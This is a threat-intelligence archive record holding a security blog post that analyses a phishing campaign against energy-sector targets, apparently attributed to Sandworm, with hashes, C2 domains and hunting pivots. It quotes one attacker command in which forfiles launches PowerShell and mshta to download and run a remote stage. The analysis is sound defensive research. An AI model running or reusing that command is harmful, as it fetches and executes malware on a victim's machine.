{ "id": "317e6cb1-26fb-431d-b4b3-045d07c1f327", "created_at": "2026-04-06T00:22:34.688574Z", "updated_at": "2026-04-10T13:12:53.2663Z", "deleted_at": null, "sha1_hash": "3fc207e060d1a9dae0c6828ac79caf0ab31b6934", "title": "RU APT targeting Energy Infrastructure (Unknown unknowns, part 3)", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2589700, "plain_text": "RU APT targeting Energy Infrastructure (Unknown unknowns, part 3)\r\nArchived: 2026-04-05 13:57:52 UTC\r\nAttacks on the Energy infrastructure raise an eyebrow, whether they're cyber-physical in nature, or purely espionage. For\r\nthat reason, when StrikeReady Labs identified a targeted spear phishing campaign tailored for the Gas Infrastructure Europe\r\n(GIE) association, we analyzed the content immediately after submission to Virustotal on October 18th. Further pivots\r\nshowed direct targeting, and in some cases compromises, of:\r\nUkraine’s electrical transmission infrastructure\r\nA Slovakian gas storage company\r\nAn American energy brokerage\r\nA Ukrainian international investment organization\r\nA Ukrainian financial auditing organization\r\nAnd other attendees of the aforementioned natural gas conference in Germany\r\nThese targets all have access to sensitive data that would be of interest to a government. This particular campaign has been\r\nongoing since early October '24. The number of energy-specific targets is highly unusual for the majority of APT threat\r\nactors, and the sustained targeting and re-targeting of Ukraine has only seen by Russia-nexus actors. The timing of phishing\r\nnatural gas organizations just before the winter is also difficult to ignore.\r\nTLDR for threat hunters: Look across your logging infrastructure for executions of mshta with an external\r\npayload, and you too could find this\r\nhttps://strikeready.com/blog/ru-apt-targeting-energy-infrastructure-unknown-unknowns-part-3/\r\nPage 1 of 8\n\nFigure 1: Initial tweet from Oct 18 '24\r\nWe performed initial triage, as we do daily on our https://bsky.app/profile/strikereadylabs.com and\r\nhttps://x.com/strikereadylabs accounts. You can follow along with our process in Part 1 and Part 2 of this series. However, at\r\nCYBERWARCON last week, an unnamed analyst flagged us down, and chuckled, “hey, nice Sandworm tweet”, which\r\nmade us take a second look at this cluster. This post won’t focus on the Sandworm specific attribution, as we do not have the\r\ntelemetry to independently make that attribution, but rather how we discovered it, and how you could pivot to find the same\r\ntypes of threats in your own network. Networking IRL FTW.\r\nA member of the infosec community on linkedin recently posited a question, “What’s your favorite network hunt?”. One of\r\nour analysts responded If I only had one, \"mshta.exe http\" . And that’s literally how we found this thread to pull on.\r\nThere are very few new files you’ll come across that execute mshta to run remote content, and you can put a pair of eyeballs\r\nonto each and every one. It won’t take more than a couple seconds to triage, provided you’re logging the appropriate\r\ntelemetry, and it works equally well against crimeware or APT. As an added bonus, it will only flag on positive detections\r\nwhere you have an “action item”, due to the nature of it being an intermediary stage after the attacker has execution ability\r\non your endpoint, but generally not a full payload. So all that is to say, it’s a great mechanism to find high fidelity hits.\r\nHopefully you’ll forgive the wizard behind the curtain from not having a more exciting answer as to how we found one of\r\nthe more advanced threat groups out there.\r\nhttps://strikeready.com/blog/ru-apt-targeting-energy-infrastructure-unknown-unknowns-part-3/\r\nPage 2 of 8\n\nFigure 2: execution/hunt paths – credit to the folks at d2lang\r\n1. Pivoting on win11signal in the LNK metadata gives us a second lnk, and a pivot on the hosting domain gives us a\r\nthird\r\nLnk Assessed Name Hosting domain\r\nb8d97d29e99e1f96e06836468db56855dc09305e3ed663c720fe700ea4bf6e73\r\nGIE Annual\r\nConference 2024 in\r\nMunich Voting\r\nResult\r\nEvent.pdf.lnk\r\nadobeprotectcheck.com\r\n806b5269e7aa9c2c82ce247b30a3e92a4f7285b21e2bcf54c8ffad86bd92ea68\r\nЗаява про витік\r\nгазу ТОВ\r\nОПЕРАТОР ГТС\r\nУКРАЇНИ.pdf.lnk\r\n(Gas leak statement\r\nLLC GTS\r\nOPERATOR\r\nUKRAINE.pdf.lnk)\r\nadobeprotectcheck.com\r\nhttps://strikeready.com/blog/ru-apt-targeting-energy-infrastructure-unknown-unknowns-part-3/\r\nPage 3 of 8\n\nzayavka.lnk\r\nWireshark\r\nAgency.pdf.lnk\r\nadobeprotectcheck.com\r\nFigure 3: additional LNK from adobeprotectcheck\r\nIt’s noteworthy that these are WebDAV servers. There are a small number of groups who phish with LNKs hosted on\r\nWebDAV servers, particularly that use the “Downloads” directory. This attacker may be attempting to blend in with the\r\nbroader criminal group. We will use this fact later on to find more infra.\r\n2. The first stage payload executed by MSHTA (shell completion of msh*e below) is not a standalone HTA at all, but a\r\nbunch of EXEs concat’d together with \u003cscript\u003e s embedded, that are parsed and executed. forfiles.exe /p C:\\\r\n/m Windows /c \"powershell . \\*i*\\*2\\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5.\r\nThe layers of obfuscation are quite robust, and referred to by many in the community as emmenhtal . Here is a small\r\nrepresentation of the decoding from the second lnk,\r\n806b5269e7aa9c2c82ce247b30a3e92a4f7285b21e2bcf54c8ffad86bd92ea68 . Much of this analysis has been\r\ndocumented by Google Cloud as well as PEAKLIGHT.\r\nFigure 4: initial script embedded in dccw exe\r\nYour eyes can notice a string substitution for EW to turn into 102, etc\r\nFigure 5: after string substitution and first decode\r\nNext you can see each code is subtracted by 950\r\nFigure 6: after -950 + loop + decode\r\nThe attacker has now moved from javascript to powershell, which is properly decrypting the next stage.\r\nFigure 7: PS created by Figure 6\r\nThe true Raison d'être is starting to become clear, and for the reader’s sake, we’ve included these scripts in the appendix.\r\nYour eyeballs can start to see the likely payload, ssowoface.dll and the decoy pdf, Zayava_pro_vitik_gasu.pdf . Below\r\nwe have picked apart the new artifacts. One of these was recently highlighted by researchers at Veriti (nice job!).\r\nurl sha256\r\ngurt.duna.ua/programy-nauczania/GTSvitikgasuStage5\r\n(dccw.exe)\r\n9caaa34fa5fab572695f49cc496820dc5e4df6d8866b3f89a49e2dab1a6f85d2\r\ngurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2 (dccw.exe)\r\n28d2c70bb31fc2be17ff15f5c07eea5f373563970ec210b3af343444222ef167\r\nhttps://strikeready.com/blog/ru-apt-targeting-energy-infrastructure-unknown-unknowns-part-3/\r\nPage 4 of 8\n\ngurt.duna.ua/programy-nauczania/ssowoface.dll d4daf30ceee80c4f639f3aff6abeb95e7fbf11e125fb90f8972b7a92e22d22e5\r\ncalendar.stib.com.ua/bestone.php next stage for both dccw above\r\nertel-audit.com/wp-includes/Zayava_pro_vitik_gasu.pdf\r\n(legit domain)\r\nf00c33c89c8468f112a9d54888eb37087e82b0732b7e587371426bfaf397eefa\r\nertel-audit.com/wp-includes/GIE_Annual_Conference_2024_Participant_Form.pdf\r\nb53cf86e6860294fd6731f7db990d7d0f2329893d83f17934836207cf361062f\r\n→ helpdesk.katolik.bydgoszcz.pl/eliot.php\r\nFigure 8: stages from the two LNK mentioned above\r\n3. Pivoting on ssowoface.dll We see a number of interesting artifacts. One is the exposed PDB\r\nC:\\Users\\user\\documents\\visual studio 2015\\Projects\\droper_dll\\Release\\droper_dll.pdb , and the dll entry\r\npoint DoUpdateInstanceEx . Looking for similar misspellings, we can find droper_exe_for_lnk , and wouldn’t you\r\nknow it, the c2 for that sample is afi-ukraine.org/wp-includes/bestone.php . Note the bestone similarity to our\r\noriginal sample.\r\nurl sha256\r\nafi-ukraine.org/wp-includes/bestone.php (legit,\r\ncompromised site)\r\n244e004ac7149e2631d68cba947cfd3d5d5352536ecb352c410b6e80e09d874a\r\nFigure 9: additional file beaconing to misspelled PDB\r\n4. Looking for similar c2s, such as “wp-includes” + *one.php, another hit pops, and this one also includes ertel-audit.com . It’s often when attackers are popping infra, they leverage a similar exploit, which is why we might\r\nexpect to see other c2s hosted on wordpress instances.\r\nfilenames sha256 next stage\r\nhosted on paths like:\r\nprotectraid.com/Downloads/Resume.lnk ,\r\nResume.pdf.lnk , etc\r\n36db27f5eb3343cfc72d261d78da44957a49cb6731acb50a96ea5694f4d616c5\r\n7f6c6bfe7aaac358ba6ba6b4c4310d3f22ae5562f1876db8d92235d0cc3857ca\r\n616cf561124ce116e4b61a26e5d2fb4ba68126ba6f3df9a66e71f57f6914292e\r\n958006c2be14c75ac32c92bb0ff0b71d4b94e9e0f358335ed976952abb772eb0\r\nfurqaanenergy.com/wp-includes/b1tuZmhqZXJba\r\n→ b1tuZmhqZXJbaGZkYm\r\n(legit, compromised site\r\nЗміни до Закону Про державний\r\nбюджет України на 2025 рік.pdf.lnk\r\nac71520a18fa7fd5f67d8cb8800c732a3c78bb1e0815bcddfbc120bf9ca86d96\r\nLike all samples, these w\r\nsimilar portals\r\nДог 205 3132 Ремтехналадка.pdf.lnk 30f5db9a7982db6ac1a3f65f4eada76b24e9438c9cf733e7b0bc353e6c5c5a25\r\nFigure 10: pivoting on bestone-like comms\r\nhttps://strikeready.com/blog/ru-apt-targeting-energy-infrastructure-unknown-unknowns-part-3/\r\nPage 5 of 8\n\n5. ssowoface.dll is quite a unique dll name. Looking on the google machine, we can find this sample on Joebox .\r\n4a302c0ed3c47231bc7c34cf2d41bc0ceb60d9c7b0023df015f75a58853f43d2 beacons to protectconnections.com ,\r\nwhich luck would have it, was sitting on the same IP as protectraid.com above, which hosted one of the payloads.\r\n6. Looking more at the ertel-audit legitimate domain, we can see the file my_resume.pdf communicating with it,\r\nwhich leads us to a second file as well. Let’s take a look:\r\nPhish 1 Phish 2\r\n1be7c11d50e38668e35760f32aac9f9536260d58685d3b88bcb9a276b3e0277a\r\nmy_resume.pdf\r\na17dc4cb60f398a8880b0a08535b405f546153ad100c381d1c3cc6861f6\r\nFigure 11: two PDF (susp) phishes\r\nTwo of these fake pdfs reach out to ertel-audit.com/wp-includes/caramel.php , and one to\r\nhelpdesk.katolik.bydgoszcz.pl/bydgoszcz.php?subid=[target] . These pdfs are a blurred out version of other decoys\r\nfrom this campaign, some of which can be seen on this post from twitter user\r\nhttps://x.com/byrne_emmy12099/status/1852002306486849587, who has highlighted at least two from this campaign.\r\nOne of those attachments, however, made its way to VT attached to a phish, from mykolazhovko@ukr.net\r\nhttps://strikeready.com/blog/ru-apt-targeting-energy-infrastructure-unknown-unknowns-part-3/\r\nPage 6 of 8\n\nFigure 12: one of the actual phish emails\r\n7. No hunt is complete without a spin through the DNS. Because sites like adobeprotectcheck.com used WebDAV,\r\nthey emit an odd HTTP response code of 207. By leveraging our friends at SilentPush, we can run a query on their\r\nwebscanner looking for CloudFlare hosted domains that have returned a 207 recently, and combine to sort by\r\nregistrar. Although this is not a perfect query, the number is small enough to eyeball, and we can expand our set of\r\ndomains:\r\ndomains New artifact\r\nadobeprotectcheck.com\r\ngieannualconferenceinmunich.com\r\ngieconferencemunich.html\r\n2281e6acb309afa3be8215672f4e6902f37e24cd75a1ef3168183dd52e5ba7ad\r\nannualgieconferenceinmunich2024.com\r\nFigure 13: XML returns\r\nDoing one last sweep through the radius of our indicators, we come across\r\n2e8817478d88cd1b21ecd583567c73333fefe70b445249d939327c50f6648007 , which appears to be a custom redirector.\r\nAlthough not inherently malicious, it does allow us to link login.antimailspam.com , which was registered in the same\r\noctober timeframe on the same registrar. Pivoting in this universe of indicators, we see some outlook phishing, which leads\r\nto more overlaps with crimeware. This may be another attempt to blend into unrelated campaigns.\r\nhttps://strikeready.com/blog/ru-apt-targeting-energy-infrastructure-unknown-unknowns-part-3/\r\nPage 7 of 8\n\nFigure 14: outlook phishing\r\nVendor Name\r\nGoogle Cloud PEAKLIGHT, just for the downloader portion\r\nProofpoint UNK_OperaEnergy\r\nFigure 15: other vendor-validated names, drop us a note to be included\r\nOur github provides a download of the relevant files mentioned in the blog\r\nAcknowledgements\r\nThe authors would like to thank the reviewers, as well as peer vendors, for their comments and corrections. Please get in\r\ntouch at research@strikeready.com if you have corrections, would like us to use your group name, or would like to\r\ncollaborate on research.\r\nSource: https://strikeready.com/blog/ru-apt-targeting-energy-infrastructure-unknown-unknowns-part-3/\r\nhttps://strikeready.com/blog/ru-apt-targeting-energy-infrastructure-unknown-unknowns-part-3/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://strikeready.com/blog/ru-apt-targeting-energy-infrastructure-unknown-unknowns-part-3/" ], "report_names": [ "ru-apt-targeting-energy-infrastructure-unknown-unknowns-part-3" ], "threat_actors": [ { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434954, "ts_updated_at": 1775826773, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3fc207e060d1a9dae0c6828ac79caf0ab31b6934.pdf", "text": "https://archive.orkl.eu/3fc207e060d1a9dae0c6828ac79caf0ab31b6934.txt", "img": "https://archive.orkl.eu/3fc207e060d1a9dae0c6828ac79caf0ab31b6934.jpg" } }